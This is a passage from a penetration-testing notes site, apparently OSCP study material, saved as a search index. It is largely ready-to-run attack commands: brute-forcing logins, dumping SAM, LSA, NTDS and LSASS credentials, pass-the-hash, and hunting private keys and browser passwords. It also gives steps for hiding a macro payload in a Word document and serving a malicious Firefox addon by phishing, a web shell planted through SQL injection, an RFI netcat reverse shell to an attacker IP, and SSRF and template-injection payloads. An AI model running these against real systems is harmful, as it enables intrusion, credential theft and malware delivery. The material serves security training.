                                            # Uses CrackMapExec over WinRM to attempt to brute force user names and passwords specified hosted on a target.\ncrackmapexec winrm <ip> -u user.list -p password.list\n
                                            # Uses CrackMapExec to enumerate smb shares on a target using a specified set of credentials. \ncrackmapexec smb <ip> -u \"user\" -p \"password\" --shares\n
                                            # Uses Hydra in conjunction with a user list and password list to attempt to crack a password over the specified service.\nhydra -L user.list -P password.list <service>://<ip>\n
                                            # Uses Hydra in conjunction with a username and password list to attempt to crack a password over the specified service.\nhydra -l username -P password.list <service>://<ip>\n
                                            # Uses Hydra in conjunction with a user list and password to attempt to crack a password over the specified service.\nhydra -L user.list -p password <service>://<ip>  \n
                                            # Uses Hydra in conjunction with a list of credentials to attempt to login to a target over the specified service. This can be used to attempt a credential stuffing attack.\nhydra -C <user_pass.list> ssh://<IP>\n
                                            # Uses CrackMapExec in conjunction with admin credentials to dump password hashes stored in SAM, over the network. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --sam\n
                                            # Uses CrackMapExec in conjunction with admin credentials to dump lsa secrets, over the network. It is possible to get clear-text credentials this way. \ncrackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa\n
                                            # Uses CrackMapExec in conjunction with admin credentials to dump hashes from the ntds file over a network. \ncrackmapexec smb <ip> -u <username> -p <password> --ntds\n
                                            # Uses Evil-WinRM to establish a Powershell session with a Windows target using a user and password hash. This is one type of `Pass-The-Hash` attack.\nevil-winrm -i <ip>  -u  Administrator -H \"<passwordhash>\" \n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#windows-local-password-attacks","title":"Windows Local Password Attacks","text":"
                                            # A command-line-based utility in Windows used to list running processes.\ntasklist /svc                        \n
                                            # Uses Windows command-line based utility findstr to search for the string \"password\" in many different file type.\nfindstr /SIM /C:\"password\" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml\n
                                            # A Powershell cmdlet is used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. \nGet-Process lsass\n
                                            # Uses rundll32 in Windows to create a LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. \nrundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full\n
                                            # Uses Pypykatz to parse and attempt to extract credentials & password hashes from an LSASS process memory dump file. \npypykatz lsa minidump /path/to/lsassdumpfile\n
                                            # Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (i.e., hklm\\sam, hklm\\security, hklm\\system).\nreg.exe save hklm\\sam C:\\sam.save\n
                                            # Uses move in Windows to transfer a file to a specified file share over the network. \nmove sam.save \\\\<ip>\\NameofFileShare\n
                                            # Uses Secretsdump.py to dump password hashes from the SAM database.\npython3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL\n
                                            # Uses Windows command line based tool vssadmin to create a volume shadow copy for `C:`. This can be used to make a copy of NTDS.dit safely. \nvssadmin CREATE SHADOW /For=C:\n
                                            # Uses Windows command line based tool copy to create a copy of NTDS.dit for a volume shadow copy of `C:`. \ncmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit \n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#linux-local-password-attacks","title":"Linux Local Password Attacks","text":"
                                            # Script that can be used to find .conf, .config and .cnf files on a Linux system.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Script that can be used to find credentials in specified file types. \nfor i in $(find / -name *.cnf 2>/dev/null \\| grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null \\| grep -v \"\\#\";done\n\n# Script that can be used to find common database files.\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n\n# Uses Linux-based find command to search for text files.\nfind /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n\n# Script that can be used to search for common file types used with scripts. \nfor l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null \\| grep -v \"doc\\|lib\\|headers\\|share\";done\n\n# Script used to look for common types of documents.\nfor ext in $(echo \".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*\");do echo -e \"\\nFile extension: \" $ext; find / -name *$ext 2>/dev/null \\| grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n# Uses Linux-based cat command to view the contents of crontab in search for credentials.\ncat /etc/crontab\n\n# Uses Linux-based  ls -la command to list all files that start with `cron` contained in the etc directory. \nls -la /etc/cron.*/                             \n\n# Uses Linux-based command grep to search the file system for key terms `PRIVATE KEY` to discover SSH keys. \ngrep -rnw \"PRIVATE KEY\" /* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based grep command to search for the keywords `PRIVATE KEY` within files contained in a user's home directory. \ngrep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based grep command to search for keywords `ssh-rsa` within files contained in a user's home directory. \ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null \\| grep \":1\"\n\n# Uses Linux-based tail command to search the through bash history files and output the last 5 lines. \ntail -n5 /home/*/.bash*\n\n# Runs Mimipenguin.py using python3.\npython3 mimipenguin.py\n\n# Runs Mimipenguin.sh using bash.\nbash mimipenguin.sh                              \n\n# Runs Lazagne.py with all modules using python2.7             |\npython2.7 lazagne.py all\n\n# Uses Linux-based command to search for credentials stored by Firefox then searches for the keyword `default` using grep. \nls -l .mozilla/firefox/ \\| grep default \n\n# Uses Linux-based command cat to search for credentials stored by Firefox in JSON. \ncat .mozilla/firefox/1bplpd86.default-release/logins.json \\| jq .\n\n# Runs Firefox_decrypt.py to decrypt any encrypted credentials stored by Firefox. Program will run using python3.9. \npython3.9 firefox_decrypt.py\n\n# Runs Lazagne.py browsers module using Python 3.\npython3 lazagne.py browsers\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#cracking-passwords","title":"Cracking Passwords","text":"
                                            # Uses Hashcat to crack NTLM hashes using a specified wordlist.\nhashcat -m 1000 dumpedhashes.txt /usr/share/wordlists/rockyou.txt\n\n# Uses Hashcat to attempt to crack a single NTLM hash and display the results in the terminal output. \nhashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt --show\n\n# Uses unshadow to combine data from passwd.bak and shadow.bk into one single file to prepare for cracking. \nunshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes\n\n# Uses Hashcat in conjunction with a wordlist to crack the unshadowed hashes and outputs the cracked hashes to a file called unshadowed.cracked. \nhashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n\n# Uses Hashcat in conjunction with a word list to crack the md5 hashes in the md5-hashes.list file. \nhashcat -m 500 -a 0 md5-hashes.list rockyou.txt\n\n# Uses Hashcat to crack the extracted BitLocker hashes using a wordlist and outputs the cracked hashes into a file called backup.cracked. \nhashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked\n\n# Runs Ssh2john.pl script to generate hashes for the SSH keys in the SSH.private file, then redirects the hashes to a file called ssh.hash.\nssh2john.pl SSH.private > ssh.hash\n\n# Uses John to attempt to crack the hashes in the ssh.hash file, then outputs the results in the terminal. \njohn ssh.hash --show\n\n# Runs Office2john.py against a protected .docx file and converts it to a hash stored in a file called protected-docx.hash. \noffice2john.py Protected.docx > protected-docx.hash\n\n# Uses John in conjunction with the wordlist rockyou.txt to crack the hash protected-docx.hash. \njohn --wordlist=rockyou.txt protected-docx.hash\n\n# Runs Pdf2john.pl script to convert a pdf file to a pdf has to be cracked. \npdf2john.pl PDF.pdf > pdf.hash\n\n# Runs John in conjunction with a wordlist to crack a pdf hash. \njohn --wordlist=rockyou.txt pdf.hash            \n\n# Runs Zip2john against a zip file to generate a hash, then adds that hash to a file called zip.hash. \nzip2john ZIP.zip > zip.hash\n\n# Uses John in conjunction with a wordlist to crack the hashes contained in zip.hash. \njohn --wordlist=rockyou.txt zip.hash\n\n# Uses Bitlocker2john script to extract hashes from a VHD file and directs the output to a file called backup.hashes. \nbitlocker2john -i Backup.vhd > backup.hashes\n\n# Uses the Linux-based file tool to gather file format information. \nfile GZIP.gzip\n\n# Script that runs a for-loop to extract files from an archive. \nfor i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null \\| tar xz;done\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/payloads/","title":"Creating malware and custom payloads","text":"","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#av0id","title":"AV0id","text":"

                                            AV0id.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#darkarmour","title":"Darkarmour","text":"

                                            Darkarmour

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#empire","title":"Empire","text":"

                                            Empire cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#fatrat","title":"FatRat","text":"

                                            FatRat cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#mythic-c2-framework","title":"Mythic C2 Framework","text":"

                                            https://github.com/its-a-feature/Mythic The Mythic C2 framework is an alternative option to Metasploit as a Command and Control Framework and toolbox for unique payload generation. A cross-platform, post-exploit, red teaming framework built with GoLang, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#msfvenom","title":"msfvenom","text":"

                                            msfvenom cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#nishang","title":"Nishang","text":"

                                            nishang cheat sheet

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#syringe","title":"Syringe","text":"

                                            syringe

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#veil","title":"Veil","text":"

                                            Veil cheat sheet.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-pdf","title":"Creating malware in pdf","text":"

                                            These two modules in metasploit:

                                            • exploit/windows/fileformat/adobe_pdf_embedded_exe
                                            • exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-word-document","title":"Creating malware in word document","text":"

                                            1. Craft an executable

                                            Use for instance veil.

                                            2. Convert it to a VisualBasic script - macro code

                                            locate exe2vba\n# Result: /usr/share/metasploit-framework/tools/exploit/exe2vba.rb\n\n# Go to the folder\ncd /usr/share/metasploit-framework/tools/exploit/\n\n# Create the malicious vba script\n./exe2vba.rb <first-parameter> path/to/nameOfOutputFile.vba\n# first parameter: malicious executable file that will be converted to macro code. Take the path to the .exe file provided by veil\n

                                            3. Create an MS Word document

                                            4. Opena new macro and embed macro code

                                            5. Copy the payload as text in the word document. If it's too long, disguise it (set font color to white).

                                            6. Convince the victim to have macros enabled.

                                            7. Start a listener and wait for the victim to connect.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/payloads/#creating-malware-in-a-firefox-addon","title":"Creating malware in a Firefox addon","text":"

                                            Use the metasploit module to generate the addon: exploit/multi/browser/firefox_xpi_bootstrapped_addon

                                            It will be served from SRVHOST:SRVPORT/URIPATH. This URL you can serve it from a phishing email.

                                            ","tags":["web pentesting","dictionary","tools","payloads"]},{"location":"webexploitation/php-type-juggling-vulnerabilities/","title":"PHP Type Juggling Vulnerabilities","text":"

                                            Read PHP Type Juggling Vulnerabilities.

                                            Copy-pasted, quoted:

                                            How vulnerability arises\n\nThe most common way that this particularity in PHP is exploited is by using it to bypass authentication.\n\nLet\u2019s say the PHP code that handles authentication looks like this:\n\nif ($_POST[\"password\"] == \"Admin_Password\") {login_as_admin();}\n\nThen, simply submitting an integer input of 0 would successfully log you in as admin, since this will evaluate to True:\n\n(0 == \u201cAdmin_Password\u201d) -> True\n

                                            In the HackTheBox machine Base, login form was bypasseable by entering an empty array into the username and password parameters:

                                            Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
                                            Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

                                            How to know? By spotting the file login.php.swp in the /login exposed directory and reading its contents with:

                                            vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

                                            Content:

                                            <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

                                            Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator === instead of the loose comparison operator ==. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

                                            ","tags":["web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/","title":"RFD attack - Reflected File Download","text":"

                                            Reflected File Download attack (RFD) combines url path segments with web services vulnerable to JSONP injection, being the goal to deliver malware to end users of the system.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#cool-proof-of-concept","title":"Cool proof of concept","text":"

                                            https://medium.com/@Johne_Jacob/rfd-reflected-file-download-what-how-6d0e6fdbe331.

                                            Read more: https://hackerone.com/reports/39658

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#prevention-and-mitigation","title":"Prevention and mitigation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#-x-content-type-options-nosniff-header-to-api-response","title":"- \"X-Content-Type-Options: nosniff\" header to API response.","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/reflected-file-download-rfd/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/","title":"RCE attack - Remote Code Execution","text":"OWASP
                                            [OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection\n
                                            ID Link to Hackinglife Link to OWASP Description 7.8 WSTG-INPV-08 Testing for SSI Injection - Identify SSI injection points (Presense of .shtml extension) with these characters: < ! # = / . \" - > and [a-zA-Z0-9] - Assess the severity of the injection.

                                            RCE\u00a0attacks involve attackers manipulating network traffic by exploiting code vulnerabilities to access a corporate system.

                                            Exploiting Blind Remote Execution Vulnerability attack in a GET request in BurpSuite (to run the queries) and Wireshark (to capture the traffic).

                                            ________\nGET /script.php?c=sleep+5&ok=ok HTTP/1.1\nHost 192.168.137.130\nUser Agent....\n...\n________\n

                                            Also other command:

                                            GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-code-execution-rce/#gaining-a-reverse-shell-from-sql-injection","title":"Gaining a reverse shell from SQL injection","text":"

                                            Take a wordpress installation that uses a mysql database. If you manage to login into the mysql pannel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

                                            Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n

                                            Now code can be executed from the browser:

                                            https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd\n

                                            One more example:

                                            Select \"<?php $output=shell_exec($_GET['cmd']);echo \"<pre>\".$output.\"</pre>\"?>\" into outfile \"/var/www/https/shell.php\" from mysql.user limit 1;\n

                                            Now code can be executed from the browser:

                                            https://example.com/shell.php?cmd=cat+/etc/passwd\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/","title":"RFI attack - Remote File Inclusion","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                                            ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                                            A Remote File Inclusion (RFI) vulnerability is a type of security flaw found in web applications that allow an attacker to include and execute remote files on a web server. This vulnerability arises due to improper handling of user-supplied input within the context of file inclusion operations. This vulnerability can have severe consequences, including unauthorized access, data theft, and even full compromise of the affected server.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#causes","title":"Causes","text":"
                                            • Insufficient Input Validation: The web application may not validate or filter user input, allowing attackers to inject malicious data.
                                            • Lack of Proper Sanitization: Even if input is validated, the application may not adequately sanitize the input before using it in file inclusion operations.
                                            • Using User Input in File Paths: Applications that dynamically include files based on user input are at high risk if they don't carefully validate and control that input.
                                            • Failure to Implement Security Controls: Developers might overlook security best practices, such as setting proper file permissions or using security mechanisms like web application firewalls (WAFs).
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#how-to-exploit-it","title":"How to exploit it?","text":"

                                            Identify Vulnerable Input: The attacker identifies a web application that accepts user input and uses it in a file inclusion operation, typically in the form of a URL parameter or a POST request parameter.

                                            Inject Malicious Payload: The attacker injects a malicious file path or URL into the vulnerable parameter. For example, they might replace a legitimate parameter like ?page=about.php with ?page=http://evil.com/malicious_script.

                                            Server Executes Malicious Code: When the web application processes the attacker's input, it dynamically includes the remote file or URL. This can lead to remote code execution on the web server, as the malicious code in the included file is executed in the server's context.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#php","title":"php","text":"

                                            In php.ini file there are some parameters that define this policy:

                                            • allow_url_fopen
                                            • allow_url_include

                                            If these functions are enabled (set to ON), then a LFI can turned into a Remote File Inclusion.

                                            1. Create a php file with the remote shell

                                            nano reverse.txt\n

                                            2. In that php file, craft malicious code

                                            <?php\npassthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") \nphp ?>\n
                                            3. Serve that file from you machine (http_serve).

                                            4. Get your machine listening in a port with netcat.

                                            5. In the injection point from where you can make a call to a URL, serve your file. For instance:

                                            https:\\\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt\n\n# Sometimes to get php executed on the victim machin (and not the attacker), add an ?\nhttps:\\\\VICTIMurlADDRESS/PATH/PATH/page=http://<attackerip>/reverse.txt?\n

                                            Sometimes there might be some filtering for the payload (which was:

                                            http://<attackerip>/reverse.txt?). \n````\n\nTo bypass it:\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#using-uppercase","title":"using uppercase","text":"

                                            https:\\VICTIMurlADDRESS/PATH/PATH/page=hTTP:///reverse.txt","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#other-bypassing-techniques-for-slashes","title":"Other bypassing techniques for slashes","text":"

                                            ## Wrappers\n\n### PHP wrapper\n\nphp://filter : allow the attacker to include local file and base64 encode as the output:\n
                                            http://IPdomain/rfi.php?language=php://filter/convert.base64-encode/resource=recurso.php
                                            PHP filter without base64 encode:\n
                                            php://filter/resource=flag.txt
                                            ### DATA wrapper\n
                                            http://IPdomain/rfi.php?language=data://text/plain,<?php system('$_GET(\"cmd\")');?>&cmd=whoami
                                            ### HTTP wrapper\n
                                            http://IPdomain/rfi.php?language=http://SERVERIP/shell.php ```

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#mitigation","title":"Mitigation","text":"

                                            In php.ini disallow:

                                            • allow_url_fopen
                                            • allow_url_include

                                            User static file inclusion (instead of dynamic file inclusion) by harcoding the files you want to include and not get them using GET or POST methods.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/remote-file-inclusion-rfi/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/","title":"SSRF attack - Server Side Request Forgery","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

                                            ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability.

                                            Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker could create a request to internet or to the intranet, which can be used to port scan or probe a remote machine. Basically, it could allow an atacker to:

                                            • Take control of a remote machine.
                                            • Read or update data.
                                            • Read the server configuration.
                                            • Connect to internal services...

                                            With:

                                            http://\nfile:///\ndict://\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#load-the-contents-of-a-file","title":"Load the Contents of a File","text":"
                                            GET https://example.com/page?page=https://malicioussite.com/shell.php\n

                                            See Burpsuite Labs

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-restricted-resources","title":"Read files from restricted resources","text":"
                                            GET https://example.com/page?page=https://localhost:8080/admin\nGET https://example.com/page?page=https://127.0.0.1:8080/admin\nGET https://example.com/page?page=file:///etc/passwd\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-other-backend-systems","title":"Read files from other backend systems","text":"

                                            In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

                                            GET https://example.com/page?page=https://localhost:3306/\nGET https://example.com/page?page=https://localhost:6379/\nGET https://example.com/page?page=https://localhost:8080/\n

                                            Gopherus sends non authenticated requests to other services and it succedde

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#techniques","title":"Techniques","text":"

                                            Bypass blacklist-based input filters

                                            Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

                                            • Use an alternative IP representation of\u00a0127.0.0.1, such as\u00a02130706433,\u00a0017700000001, or\u00a0127.1.
                                            • Register your own domain name that resolves to\u00a0127.0.0.1. You can use\u00a0spoofed.burpcollaborator.net\u00a0for this purpose.
                                            • Obfuscate blocked strings using URL encoding or case variation.
                                            • Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an\u00a0http:\u00a0to\u00a0https:\u00a0URL during the redirect has been shown to bypass some anti-SSRF filters.

                                            Bypass whitelist-based input filters

                                            Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

                                            • Using the\u00a0@\u00a0character to separate between the userinfo and the host:\u00a0`https://expected-host:fakepassword@evil-host
                                            • URL fragmentation with the\u00a0#\u00a0character:\u00a0https://attacker-domain#expected-domain
                                            • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: - https://expected-host.evil-host
                                            • URL encoding. Double URL-encode characters to confuse the URL-parsing code.
                                            • Fuzzing
                                            • Combinations of all of the above
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploiting-redirection-vulnerabilities","title":"Exploiting redirection vulnerabilities","text":"

                                            It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#resources","title":"Resources","text":"
                                            • Portswigger: https://portswigger.net/web-security/ssrf.
                                            • Portswigger labs.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            • Gopherus.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/","title":"Server-side Template Injection (SSTI)","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#what-is-ssti","title":"What is SSTI?","text":"

                                            Web applications frequently use template systems to embed dynamic content in web pages and emails.

                                            For instance, ASP framework (Razor), PHP framework (Twig, Symfony, Smarty, Laravel, Slim, Plates), Python frameworks (django, mako, jinja2), Java frameworks (Groovy, Freemarker, Jinjava, Pebble, Thymeleaf, Velocity, Spring, patTemplate, Expression Language EL), Javascript frameworks (Handlebars, Codepen, Lessjs, Lodash), Ruby framework (ERB, Slim).

                                            Server-side Template Injection vulnerabilities (SSTI) occur when user input is trusted when embedding a template, which is an unsafe implementation and might lead to remote code execution on the server.

                                            OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                                            ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. Resources for these notes
                                            • Portswigger: Server-Side Template Injection
                                            • Hacktricks: SSTI payloads
                                            Payloads
                                            • PayloadsAllTheThings for SSTI

                                            Snipped of vulnerable source code:

                                            custom_email={{self}}\n

                                            What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible execute arbitrary code directly or even to escape the sandbox and execute it. Following the example, in this POST request the expected email value has been replaced by a payload and it gets executed:

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-detect-injection-points","title":"1. Detect injection points","text":"

                                            Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely.\u00a0To detect it, we need to invoke the template engine by embedding a statement.

                                            Here\u2019s a simple example of using Twig in a PHP application. This would be the exampletemplate.twig:

                                            <!DOCTYPE html>  \n<html>  \n<head>  \n    <title>{{ title }}</title>  \n</head>  \n<body>  \n    <h1>Hello, {{ name }}!</h1>  \n</body>  \n</html>\n

                                            And the PHP rendering the Twig template:

                                            <?php  \nrequire_once 'example/page.php';  \n\n$loader = new \\Twig\\Loader\\FilesystemLoader(__DIR__);  \n$twig = new \\Twig\\Environment($loader);  \n\n$template = $twig->load('exampletemplate.twig');  \necho $template->render(['title' => 'Twig Example', 'name' => 'John']);  \n?>\n

                                            Now, coming back to our web app, we could curl the following:

                                            $ curl -g 'http://www.target.com/page?name={{7*7}}'\n

                                            With SSTI the response would be:

                                            Hello 49!\n

                                            Trick:There are a huge number of template languages but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request. This polyglot payload will trigger an error in presence of a SSTI vulnerability:

                                            ${{<%[%'\"}}%\\.\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-identify-the-template-engine","title":"2. Identify the template engine","text":"

                                            After detecting template injection, the next step is to identify the template engine in use.

                                            Green and red arrows represent 'success' and 'failure' responses respectively. In some cases, a single payload can have multiple distinct success responses - for example, the probe\u00a0{{7*'7'}}\u00a0would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.

                                            Payloads for different Template engines
                                            • PayloadsAllTheThings for SSTI
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-exploitation","title":"3. Exploitation","text":"

                                            Once you discover a server-side template injection vulnerability, and identify the template engine being used, successful exploitation typically involves the following process.

                                            • Read

                                              • Template syntax
                                              • Security documentation
                                              • Documented exploits
                                            • Explore the environment:

